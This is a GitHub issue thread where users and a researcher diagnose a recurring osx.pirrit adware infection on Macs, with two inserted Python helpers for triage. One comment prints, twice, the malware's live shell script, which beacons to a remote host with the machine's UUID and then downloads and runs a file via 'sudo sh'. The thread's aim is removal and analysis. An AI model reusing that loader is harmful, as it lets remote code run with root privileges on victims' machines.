aserper / osx.pirrit_removal

Removal tool for osx.pirrit

The malware seems to have mutated #3

Open noamf opened 8 years ago

noamf commented 8 years ago

Running the scripts does not help any more. It seems to remove one instance of the malware, but there seems to be a mechanism now that continuously creates new instances. I've seen a few at a time on my infected machine and could not find how to stop it from creating new ones.

jonespen commented 8 years ago

Same problem here. When I run $ dscl . -list /Users UniqueID | grep 401 it returns 14 (!) users, but when I run the script, $netPrefFileName and $appName seem to be empty. Probably because /Library/Preferences/com.common.plist does not exist. However, com.fixedly.plist does exist (fixedly is the current (random) name of the adware). Any ideas?

Btw, really great work @aserper, this thing is a real pain in the ass.

aserper commented 8 years ago

Hi all, sorry for the late reply, I've been travelling. @jonespen that's crazy! Can you share the output of dscl? Do you happen to have the dropper?

jonespen commented 8 years ago

Sure!

$ dscl . -list /Users UniqueID | grep 401
delightedly             401
dexterity               401
diatropism              401
fucosan                 401
loadsome                401
manzanita               401
nonahydrate             401
parasiticidal           401
pituite                 401
ringable                401
seclusionist            401
stereographical         401
trisyllabical           401
upspeak                 401

Love the name parasiticidal btw haha

By the dropper, do you mean the folder containing rec_script.sh?
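Added example (not code from this thread or from the osx.pirrit_removal repository): a small check over dscl output like the listing above. Fourteen accounts sharing one UID is the anomaly worth detecting in general, so the check groups accounts by UID and flags any UID held by more than one account, plus any non-Apple account below UID 500 (such accounts are hidden from the login window). The sample is the listing from this comment padded with a few ordinary accounts; the extra accounts, the constant names and the BASELINE set are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample: the `dscl . -list /Users UniqueID` output posted in the
# thread, padded with a few ordinary macOS accounts (assumed, not from the
# thread) so the check has legitimate entries to leave alone.
DSCL_OUTPUT = """\
_spotlight              89
daemon                  1
delightedly             401
dexterity               401
diatropism              401
fucosan                 401
loadsome                401
manzanita               401
nonahydrate             401
parasiticidal           401
pituite                 401
ringable                401
seclusionist            401
stereographical         401
trisyllabical           401
upspeak                 401
jon                     501
nobody                  -2
root                    0
"""

# Accounts every macOS install has. Anything else below UID 500 is hidden from
# the login window and, unless it is an Apple service account ("_..."), worth a look.
BASELINE = {"root", "daemon", "nobody"}


def parse_dscl_users(text):
    """Parse `dscl . -list /Users UniqueID` output into {username: uid}."""
    users = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(-?\d+)\s*$", line)
        if m:
            users[m.group(1)] = int(m.group(2))
    return users


def suspicious_accounts(users):
    """Flag UIDs shared by several accounts and hidden non-Apple accounts."""
    by_uid = defaultdict(list)
    for name, uid in users.items():
        by_uid[uid].append(name)
    shared = {uid: sorted(names) for uid, names in by_uid.items() if len(names) > 1}
    hidden = sorted(
        name for name, uid in users.items()
        if 0 < uid < 500 and not name.startswith("_") and name not in BASELINE
    )
    return {"shared_uids": shared, "hidden_accounts": hidden}


if __name__ == "__main__":
    report = suspicious_accounts(parse_dscl_users(DSCL_OUTPUT))
    for uid, names in report["shared_uids"].items():
        print(f"UID {uid} is shared by {len(names)} accounts: {', '.join(names)}")
    print("hidden non-Apple accounts:", ", ".join(report["hidden_accounts"]))
```

On a live machine, feed the function the real output of the dscl command; the home directories of flagged accounts (see the later comments in this thread) are the next thing to inspect.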

aserper commented 8 years ago

The folder is good but it isn't the dropper. The dropper is usually an installer of some sort, a pkg file. Read my report / see my talk (it's on YouTube) about pirrit, you'll understand.

jonespen commented 8 years ago

Ah ok. Yeah, I saw your talk yesterday, fascinating in a weird way.

The problem is I have no idea how the mac got infected (it's my girlfriend's). However, looking through ~/Downloads I find MacKeeper.pkg (dated 20 Aug 2015). MacKeeper.pkg.zip https://github.com/aserper/osx.pirrit_removal/files/301305/MacKeeper.pkg.zip (disclaimer: you probably shouldn't run this)

aserper commented 8 years ago

Probably linked to it. Check its xattrs to see if it was dropped by another program. I'll look into the archive tomorrow since I am heavily jetlagged (BOSTON-LONDON-TEL AVIV takes its toll).

jonespen commented 8 years ago

No worries!

Not quite sure how to check the xattrs, but ran this:

$ xattr MacKeeper.pkg
com.apple.metadata:kMDItemDownloadedDate
com.apple.metadata:kMDItemWhereFroms
com.apple.quarantine

aserper commented 8 years ago

Do the same but with xattr -l and post it here.
jonespen commented 8 years ago

$ xattr -l MacKeeper.pkg
com.apple.metadata:kMDItemDownloadedDate:
00000000  62 70 6C 69 73 74 30 30 A1 01 33 41 BB 85 F1 BE  |bplist00..3A....|
00000010  7D 91 BC 08 0A 00 00 00 00 00 00 01 01 00 00 00  |}...............|
00000020  00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 13                                   |.....|
00000035
com.apple.metadata:kMDItemWhereFroms:
00000000  62 70 6C 69 73 74 30 30 A2 01 02 5F 10 5C 68 74  |bplist00..._..ht|
00000010  74 70 3A 2F 2F 64 6F 77 6E 6C 6F 61 64 2E 6D 61  |tp://download.ma|
00000020  63 6B 65 65 70 65 72 2E 63 6F 6D 2F 70 61 63 6B  |ckeeper.com/pack|
00000030  61 67 65 2E 70 68 70 3F 6B 65 79 3D 6D 7A 62 5F  |age.php?key=mzb_|
00000040  32 34 31 2E 31 31 34 37 39 32 37 30 2E 31 34 34  |241.11479270.144|
00000050  30 30 37 30 32 30 31 2E 36 2E 6D 7A 62 26 74 72  |0070201.6.mzb&tr|
00000060  74 3D 32 39 5F 32 31 34 30 30 5F 11 01 28 68 74  |t=29_21400_..(ht|
00000070  74 70 3A 2F 2F 6D 61 63 6B 65 65 70 65 72 61 70  |tp://mackeeperap|
00000080  70 32 2E 6D 61 63 6B 65 65 70 65 72 2E 63 6F 6D  |p2.mackeeper.com|
00000090  2F 6C 61 6E 64 69 6E 67 73 2F 31 32 33 2E 31 2F  |/landings/123.1/|
000000A0  69 6E 64 65 78 2E 70 68 70 3F 61 66 66 69 64 3D  |index.php?affid=|
000000B0  6D 7A 62 5F 32 34 31 2E 31 31 34 37 39 32 37 30  |mzb_241.11479270|
000000C0  2E 31 34 34 30 30 37 30 32 30 31 2E 36 2E 6D 7A  |.1440070201.6.mz|
000000D0  62 26 75 74 6D 5F 73 6F 75 72 63 65 3D 6D 74 6D  |b&utm_source=mtm|
000000E0  26 75 74 6D 5F 6D 65 64 69 75 6D 3D 26 75 74 6D  |&utm_medium=&utm|
000000F0  5F 63 61 6D 70 61 69 67 6E 3D 6D 6B 5F 6D 74 6D  |_campaign=mk_mtm|
00000100  5F 63 70 69 5F 74 33 5F 6E 69 6E 63 5F 6A 63 26  |_cpi_t3_ninc_jc&|
00000110  75 74 6D 5F 74 65 72 6D 3D 26 75 74 6D 5F 63 6F  |utm_term=&utm_co|
00000120  6E 74 65 6E 74 3D 72 6F 6E 5F 63 6C 65 61 6E 70  |ntent=ron_cleanp|
00000130  72 6F 74 31 37 26 75 73 65 72 44 65 66 69 6E 65  |rot17&userDefine|
00000140  72 3D 6D 7A 62 5F 32 33 31 34 26 74 72 74 3D 32  |r=mzb_2314&trt=2|
00000150  39 5F 32 31 34 30 30 26 61 6C 65 72 74 3D 31 33  |9_21400&alert=13|
00000160  26 74 69 64 5F 65 78 74 3D 32 30 53 49 35 35 32  |&tid_ext=20SI552|
00000170  38 72 47 46 7A 77 45 65 34 31 44 36 72 58 53 31  |8rGFzwEe41D6rXS1|
00000180  7A 73 6F 32 49 30 30 30 2E 3B 33 30 39 34 37 3B  |zso2I000.;30947;|
00000190  31 35 31 33 36 33 00 08 00 0B 00 6A 00 00 00 00  |151363.....j....|
000001A0  00 00 02 01 00 00 00 00 00 00 00 03 00 00 00 00  |................|
000001B0  00 00 00 00 00 00 00 00 00 00 01 96              |............|
000001bc
com.apple.quarantine: 0002;55d5ba3e;Safari;25A4735B-34F7-4AAC-9E4A-BEB55B369D22

aserper commented 8 years ago

Looks like this was downloaded straight from MacKeeper's website though. Do you have any weird files in /tmp and /var/tmp?

jonespen commented 8 years ago

/var/tmp contains a lot of weird shit.

[image: screenshot of /var/tmp] https://cloud.githubusercontent.com/assets/230841/15837711/a59f3a8c-2c3a-11e6-969f-3c5dcad456e0.png

dit8.tgz is pirrit related right? Also, BrowserEnhancer24052016_HelperBar.tgz doesn't look good. I mean, everything there looks shady :p

aserper commented 8 years ago

Indeed! Could you zip that directory and upload it?

aserper commented 8 years ago

@jonespen I just read everything again (I was really jetlagged yesterday). The MacKeeper in your downloads directory is too old to be linked to this. Maybe try looking at the xattrs (-l) of the files you found in your temp directory. I am REALLY curious about how it was dropped on your machine. I got a sample which is just a little bit older than what you have - yours is really new! Please zip and send whatever is in this screenshot if that's ok - I'm really curious.

jonespen commented 8 years ago

Yeah, I'll try to send it later today when I get my hands on the mac.

jonespen commented 8 years ago

Here is /var/tmp: https://www.dropbox.com/s/60oy6wmq88shsi0/Arkiv.zip?dl=0

aserper commented 8 years ago

Thanks! Will look at it tomorrow first thing. Btw, did you try to see what is in all of those users' home directories? You could always "su ", the password will be "test". Then just "cd ~" and see what's there.

jonespen commented 8 years ago

bash-3.2$ su delightedly
Password:
bash-3.2$ cd ~
bash-3.2$ ls
Library
bash-3.2$ cd Library/
bash-3.2$ ls
Preferences
bash-3.2$ cd Preferences/
bash-3.2$ ls
com.trolltech.plist
bash-3.2$ cat com.trolltech.plist 
bplist00?
ofQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dylib-x86_64o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqcorewlanbearer?dyliboeQt Plugin Cache 4?8?false.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib-x86_64o?Qt Factory Cache 4?8.com?trolltech?Qt?QBearerEngineFactoryInterface:.Library.catholicness.Contents.PlugIns.bearer.libqgenericbearer?dylib? U40806Q0_#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?

                                                                          _2016-04-04T11:35:19Xcorewlan?U40806_#macosx macx-cocoa g++-4 full-config_2016-04-04T11:35:19?_2016-04-04T11:35:19Wgeneri???????
                                          "%;DIOu????bash-3.2$ 
bash-3.2$ 

Seems like most of the users contain the same folder/content

aserper commented 8 years ago

I am starting to suspect that pirrit might have installed itself several times on your machines. Will look into the files soon and report back. BTW, if you're on twitter, it's a much more convenient way to talk - @0xAmit. If not, we can still continue here :)

noamf commented 8 years ago

I'm at @noamf1. I would have contributed more info to the discussion, but I ended up re-imaging the mac before you were back from your travels, so I don't have the files anymore. From what I remember trying to remove it, as I was removing instances (applications with random names) new ones were getting created.

jonespen commented 8 years ago

Sent you a follow request on twitter @aserper . I'm also pretty close to just wiping the mac, but I really want to beat this thing ;)

aserper commented 8 years ago

@jonespen Finally started working on your sample! There's some disturbing shit there! A new binary called "protector" that reinstalls the autoruns once removed! https://twitter.com/0xAmit/status/742321855604875264

markhughes commented 7 years ago

So, this is what I've found it's created on my computer...

Sophos detects this as Pirrit

[screenshot: screen shot 2017-10-26 at 1 31 47 pm]

"Cube" is the application it installed along with it (a media codec apparently)

Edit: here's a copy of the installer: https://www.dropbox.com/s/x4irkfh5l0ujrf9/CodecFix%20%282%29.dmg.zip?dl=0

markhughes commented 7 years ago

I can't seem to compress the main binary, but here is the other stuff..

dvs_roa.zip

markhughes commented 7 years ago

Looks like it's talking to http://i.firstinstallmac.club/c/cc?id=... so I've added

127.0.0.1 i.firstinstallmac.club

to my hosts file.

23597 ??         0:00.07 /bin/sh -c #!/bin/sh\012rep=0;\012ad="http://i.firstinstallmac.club/c/cc?id=";\012\012ghrtyuoi ()\012{\012\011md=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }');\012\011ww=$ad$md;\012\012    erd=$(curl --silent --location --write-out "\n%{http_code}\n" $ww) 2>/dev/null;\012    st=$(echo "$erd" | sed -n '$p');\012    cnt=$(echo "$erd" | sed '$d');\012\012    if (($st == 200)); then\012\011\011\012\011\011sz=${#cnt};\012\011\011\012        if [ $sz == 2 ]; then\012\011\011\011prest;\012        else\012\011\011\011gtfal=$cnt;\012\011\011\011gtpdt;\012        fi\012    else\012        rep=$((rep+1))\012\012        if ((rep > 3)); then\012            rep=0;\012            prest;\012        else\012            riped;\012        fi\012    fi\012}\012\012prest ()\012{\012    if [ -e "/Library/pfutil" ]\012    then\012        dateVal=$(cat "/Library/pfutil");\012        dateCur=$(date +%s);\012        dateDiff=$(($dateCur - $dateVal));\012        if (($dateDiff < 86400))\012        then\012            sleep 3600;\012            prest;\012        else\012            sleep 1\012        fi\012    else\012        date +%s > "/Library/pfutil";\012        sleep 86400;\012    fi\012    rm "/Library/pfutil";\012    ghrtyuoi;\012}\012\012riped ()\012{\012    sleep 300;\012    ghrtyuoi;\012}\012\012gtpdt ()\012{\012    se=$(curl --silent --location --write-out "\n%{http_code}\n" $gtfal --output "$TMPDIR/file") 2>/dev/null;\012    sc=$(echo "$se" | sed -n '$p');\012\012    if (($sc == 200)); then\012\011\011chmod +x "$TMPDIR/file"\012        sudo sh "$TMPDIR/file";\012        prest;\012    else\012        prest;\012    fi\012}\012\012clear\012ghrtyuoi;\012

68009 ??         0:00.03 /bin/sh -c #!/bin/sh\012rep=0;\012ad="http://i.firstinstallmac.club/c/cc?id=";\012\012ghrtyuoi ()\012{\012\011md=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }');\012\011ww=$ad$md;\012\012    erd=$(curl --silent --location --write-out "\n%{http_code}\n" $ww) 2>/dev/null;\012    st=$(echo "$erd" | sed -n '$p');\012    cnt=$(echo "$erd" | sed '$d');\012\012    if (($st == 200)); then\012\011\011\012\011\011sz=${#cnt};\012\011\011\012        if [ $sz == 2 ]; then\012\011\011\011prest;\012        else\012\011\011\011gtfal=$cnt;\012\011\011\011gtpdt;\012        fi\012    else\012        rep=$((rep+1))\012\012        if ((rep > 3)); then\012            rep=0;\012            prest;\012        else\012            riped;\012        fi\012    fi\012}\012\012prest ()\012{\012    if [ -e "/Library/pfutil" ]\012    then\012        dateVal=$(cat "/Library/pfutil");\012        dateCur=$(date +%s);\012        dateDiff=$(($dateCur - $dateVal));\012        if (($dateDiff < 86400))\012        then\012            sleep 3600;\012            prest;\012        else\012            sleep 1\012        fi\012    else\012        date +%s > "/Library/pfutil";\012        sleep 86400;\012    fi\012    rm "/Library/pfutil";\012    ghrtyuoi;\012}\012\012riped ()\012{\012    sleep 300;\012    ghrtyuoi;\012}\012\012gtpdt ()\012{\012    se=$(curl --silent --location --write-out "\n%{http_code}\n" $gtfal --output "$TMPDIR/file") 2>/dev/null;\012    sc=$(echo "$se" | sed -n '$p');\012\012    if (($sc == 200)); then\012\011\011chmod +x "$TMPDIR/file"\012        sudo sh "$TMPDIR/file";\012        prest;\012    else\012        prest;\012    fi\012}\012\012clear\012ghrtyuoi;\012
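Added example (not code from this thread or from the osx.pirrit_removal repository): a triage helper for ps -ax rows like the two above. ps prints the newlines and tabs inside an inline "sh -c" script as the octal escapes \012 and \011, which is why the whole script arrives on one line; the helper reverses that, then pulls out what a responder needs from the decoded script: the URL it beacons to and a hosts-file line to sinkhole it (the approach taken in this comment), the marker file it uses to pace itself, its sleep intervals, and whether it downloads a file and hands it to sudo sh. The sample row is the first of the two pasted above, copied verbatim; the constant and function names are assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the first `ps -ax` row pasted above (PID 23597), verbatim.
# ps renders newlines and tabs in the `sh -c` argument as \012 and \011.
PS_LINE = r'''23597 ??         0:00.07 /bin/sh -c #!/bin/sh\012rep=0;\012ad="http://i.firstinstallmac.club/c/cc?id=";\012\012ghrtyuoi ()\012{\012\011md=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }');\012\011ww=$ad$md;\012\012    erd=$(curl --silent --location --write-out "\n%{http_code}\n" $ww) 2>/dev/null;\012    st=$(echo "$erd" | sed -n '$p');\012    cnt=$(echo "$erd" | sed '$d');\012\012    if (($st == 200)); then\012\011\011\012\011\011sz=${#cnt};\012\011\011\012        if [ $sz == 2 ]; then\012\011\011\011prest;\012        else\012\011\011\011gtfal=$cnt;\012\011\011\011gtpdt;\012        fi\012    else\012        rep=$((rep+1))\012\012        if ((rep > 3)); then\012            rep=0;\012            prest;\012        else\012            riped;\012        fi\012    fi\012}\012\012prest ()\012{\012    if [ -e "/Library/pfutil" ]\012    then\012        dateVal=$(cat "/Library/pfutil");\012        dateCur=$(date +%s);\012        dateDiff=$(($dateCur - $dateVal));\012        if (($dateDiff < 86400))\012        then\012            sleep 3600;\012            prest;\012        else\012            sleep 1\012        fi\012    else\012        date +%s > "/Library/pfutil";\012        sleep 86400;\012    fi\012    rm "/Library/pfutil";\012    ghrtyuoi;\012}\012\012riped ()\012{\012    sleep 300;\012    ghrtyuoi;\012}\012\012gtpdt ()\012{\012    se=$(curl --silent --location --write-out "\n%{http_code}\n" $gtfal --output "$TMPDIR/file") 2>/dev/null;\012    sc=$(echo "$se" | sed -n '$p');\012\012    if (($sc == 200)); then\012\011\011chmod +x "$TMPDIR/file"\012        sudo sh "$TMPDIR/file";\012        prest;\012    else\012        prest;\012    fi\012}\012\012clear\012ghrtyuoi;\012'''

PS_ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(.*)$")  # PID TT TIME CMD
OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")


def unescape_ps(cmd):
    """Reverse ps's octal escaping so the embedded script reads as written."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), cmd)


def triage_ps_row(row):
    """Pull the indicators a responder needs out of one `ps -ax` row.

    Returns the decoded script plus the URLs it contacts, hosts-file lines that
    would sinkhole them, the paths it writes, its sleep intervals (the beacon
    schedule) and whether it downloads a file and runs it.
    """
    m = PS_ROW.match(row)
    if not m:
        raise ValueError("not a ps -ax row: %r" % row[:40])
    pid, cmd = int(m.group(1)), m.group(4)
    # `/bin/sh -c <script>`: the script itself is the argument, nothing on disk.
    inline = cmd.startswith(("/bin/sh -c ", "sh -c "))
    script = unescape_ps(cmd.split(" -c ", 1)[1]) if inline else ""
    urls = re.findall(r"""https?://[^\s"';]+""", script)
    hosts = sorted({urlparse(u).hostname for u in urls})
    return {
        "pid": pid,
        "inline_script": inline,
        "script": script,
        "urls": urls,
        "hosts_block": ["127.0.0.1 %s" % h for h in hosts],
        "marker_files": sorted(set(re.findall(r'"(/[\w./-]+)"', script))),
        "sleep_seconds": sorted({int(s) for s in re.findall(r"\bsleep\s+(\d+)", script)}),
        "curl_calls": len(re.findall(r"\bcurl\b", script)),
        # A downloaded file handed to `sudo sh` is the second-stage payload.
        "runs_download": bool(re.search(r"\bsudo\s+sh\s+\"?\$TMPDIR/", script)),
    }


if __name__ == "__main__":
    report = triage_ps_row(PS_LINE)
    print(report["script"])
    for key in ("urls", "hosts_block", "marker_files", "sleep_seconds", "runs_download"):
        print("%s: %s" % (key, report[key]))
```

Two things the decoded script makes plain: the beacon is keyed on the machine's IOPlatformUUID, so the request itself is a per-host identifier, and the /Library/pfutil timestamp file is how it rate-limits itself to one attempt per day, which is why the process can look idle for long stretches.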

dripisforever commented 6 years ago

@markhughes I got the same folder too! How did you fix this?

markhughes commented 6 years ago

Alright it was a pain in the ass from memory.

Drop that line into your /etc/hosts file first:

127.0.0.1   i.firstinstallmac.club

markhughes commented 6 years ago

@strivemag

Drop a copy of ps -ax please

markhughes commented 6 years ago

I don't think I could properly delete the file, but if you delete everything you can in that folder and remove the startup stuff it should work. I'm sorry, I really don't remember what I did to get rid of it.